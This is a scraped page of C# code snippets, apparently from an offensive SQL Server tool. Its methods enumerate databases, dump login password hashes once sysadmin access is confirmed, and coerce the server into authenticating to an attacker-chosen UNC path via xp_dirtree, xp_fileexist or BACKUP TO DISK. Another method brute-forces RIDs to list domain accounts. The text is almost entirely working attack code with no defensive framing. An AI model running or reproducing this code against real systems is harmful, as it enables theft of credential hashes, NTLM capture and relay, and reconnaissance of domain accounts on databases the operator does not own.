Exemple #1
0
        internal override bool Query()
        {
            string query1_1 = string.Format(
                "SELECT  \'{0}\' as [ComputerName],\n" +
                "\'{1}\' as [Instance],",
                computerName, instance);

            int versionShort = 0;

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                SQLServerInfo serverInfo = new SQLServerInfo(credentials);
                serverInfo.SetInstance(instance);
                if (!serverInfo.Query())
                {
                    return(false);
                }
                SQLServerInfo.Details details = serverInfo.GetResults();

                int.TryParse(details.SQLServerMajorVersion.Split('.').First(), out versionShort);

                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(query1_2);
                if (versionShort > 10)
                {
                    sb.Append(query1_3);
                }
                sb.Append(query1_4);

                if (!string.IsNullOrEmpty(databaseFilter))
                {
                    sb.Append(databaseFilter);
                }
                if (!string.IsNullOrEmpty(noDefaultsFilter))
                {
                    sb.Append(noDefaultsFilter);
                }
                if (!string.IsNullOrEmpty(hasAccessFilter))
                {
                    sb.Append(hasAccessFilter);
                }
                if (!string.IsNullOrEmpty(sysAdminFilter))
                {
                    sb.Append(sysAdminFilter);
                }
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                databases = sql.Query <Database>(sb.ToString(), new Database());
            }
            return(true);
        }
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                if (!SQLSysadminCheck.Query(instance, computerName, credentials))
                {
                    Console.WriteLine("[-] User is not Sysadmin");
                    return(false);
                }

                SQLServerInfo i = new SQLServerInfo(credentials);
                i.SetInstance(instance);
                i.Query();
                SQLServerInfo.Details d = i.GetResults();

                int versionShort;
                if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
                {
                    Console.WriteLine("[-] Unable to ascertain SQL Version");
                    Console.WriteLine("[*] It is possible to override this with the --version flag");
                    return(false);
                }

                string query = string.Empty;
                if (8 < versionShort)
                {
                    query = QUERY1_1;
                }
                else
                {
                    query = QUERY2_1;
                }

                //table = sql.Query(query);
                hashes = sql.Query <Hash>(query, new Hash());
            }
            return(false);
        }
Exemple #3
0
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (sql.Connect())
                {
                    SQLServerInfo i = new SQLServerInfo(credentials);
                    i.SetInstance(instance);
                    i.Query();
                    SQLServerInfo.Details d = i.GetResults();

                    int versionShort;
                    if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
                    {
                        Console.WriteLine("[-] Unable to ascertain SQL Version");
                        Console.WriteLine("[*] It is possible to override this with the --version flag");
                        return(false);
                    }

                    string query1 = string.Empty;
                    string query2 = string.Empty;
                    if (11 > versionShort)
                    {
                        query1 = string.Format("BACKUP LOG [TESTING] TO DISK = \'{0}\'", uncpath);
                        query2 = string.Format("BACKUP DATABASE [TESTING] TO DISK = \'{0}\'", uncpath);
                    }
                    else
                    {
                        query1 = string.Format("xp_dirtree \'{0}\'", uncpath);
                        query2 = string.Format("xp_fileexist \'{0}\'", uncpath);
                    }

                    _Query(sql, query1);
                    _Query(sql, query2);
                }
            }
            return(true);
        }
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                SQLServerInfo info = new SQLServerInfo(credentials);
                info.SetInstance(instance);
                info.Query();
                SQLServerInfo.Details d = info.GetResults();

                domainName = d.DomainName;

                string query1_1 = string.Format("SELECT SUSER_SID(\'{0}\\{1}\') as DomainGroupSid", domainName, domainGroup);
#if DEBUG
                Console.WriteLine(query1_1);
#endif
                DataTable table    = sql.Query(query1_1);
                byte[]    sidBytes = (byte[])table.AsEnumerable().First()["DomainGroupSid"];
                string    strSid   = BitConverter.ToString(sidBytes).Replace("-", "").Substring(0, 48);

                Console.WriteLine("Base SID: {0}", strSid);

                for (int i = start; i <= end; i++)
                {
                    string strHexI  = i.ToString("x");
                    int    nStrHexI = strHexI.Length;
                    string rid      = strHexI;
                    if (0 != nStrHexI % 2)
                    {
                        rid = "0" + strHexI;
                    }

                    string[] arrSplit = Split(rid, 2).ToArray();
                    Array.Reverse(arrSplit);
                    rid = string.Join("", arrSplit);
                    rid = rid.PadRight(8, '0');
                    rid = "0x" + strSid + rid;

                    string query2_1 = string.Format("SELECT SUSER_SNAME({0}) as [DomainAccount]", rid);
#if DEBUG
                    Console.WriteLine(query2_1);
#endif
                    table = sql.Query(query2_1);

                    foreach (DataRow row in table.AsEnumerable())
                    {
                        try
                        {
                            if (row["DomainAccount"] is DBNull)
                            {
                                continue;
                            }

                            Fuzz f = new Fuzz
                            {
                                ComputerName  = computerName,
                                Instance      = instance,
                                SID           = rid,
                                RID           = i,
                                DomainAccount = (string)row["DomainAccount"],
                            };
                            fuzzed.Add(f);
                        }
                        catch (Exception ex)
                        {
                            if (ex is ArgumentNullException)
                            {
                                continue;
                            }
                            else
                            {
                                Console.WriteLine(ex.Message);
                            }
                            return(false);
                        }
                    }
                }
            }
            return(true);
        }